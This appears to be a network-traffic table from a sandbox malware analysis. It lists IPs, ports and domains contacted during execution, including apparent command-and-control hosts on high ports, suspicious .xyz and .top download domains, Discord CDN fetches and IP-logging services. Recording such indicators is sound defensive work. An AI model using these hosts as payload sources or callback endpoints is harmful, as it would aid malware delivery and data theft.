| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.160.30:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 52.219.156.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 135.148.139.222:1494 | | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 95.181.172.100:55640 | | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.8.88:44263 | | tcp |
| N/A | 45.14.49.128:5385 | | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 8.8.8.8:53 | bestinternetstore.xyz | udp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 135.181.123.52:12073 | | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.62.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 52.219.62.7:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 52.219.64.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.64.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:53 | script.googleusercontent.com | udp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 45.129.236.6:63318 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 8.8.8.8:53 | u1452023.cp.regruhosting.ru | udp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 131.253.33.200:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 2.22.22.210:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 13.32.240.78:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.97.153.169:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 40.126.31.141:443 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 158.69.65.151:80 | geoiptool.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 20.82.209.183:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 205.196.123.76:443 | download1388.mediafire.com | tcp |
| N/A | 188.34.200.103:80 | 188.34.200.103 | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 2.22.22.136:443 | tcp | |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.22.65.104:443 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 98.126.13.146:436 | tcp | |
| N/A | 104.21.7.179:443 | mybrowserinfo.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 2.22.22.219:443 | tcp | |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 2.22.22.219:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 84.53.185.32:443 | tcp | |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 84.53.185.32:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 54.225.64.149:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.26.7.228:443 | udp | |
| N/A | 104.26.6.228:443 | udp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 2.22.22.219:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 138.68.244.123:443 | tcp | |
| N/A | 138.68.244.123:443 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 104.80.224.34:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.144:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 13.32.240.76:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.210:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.144:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
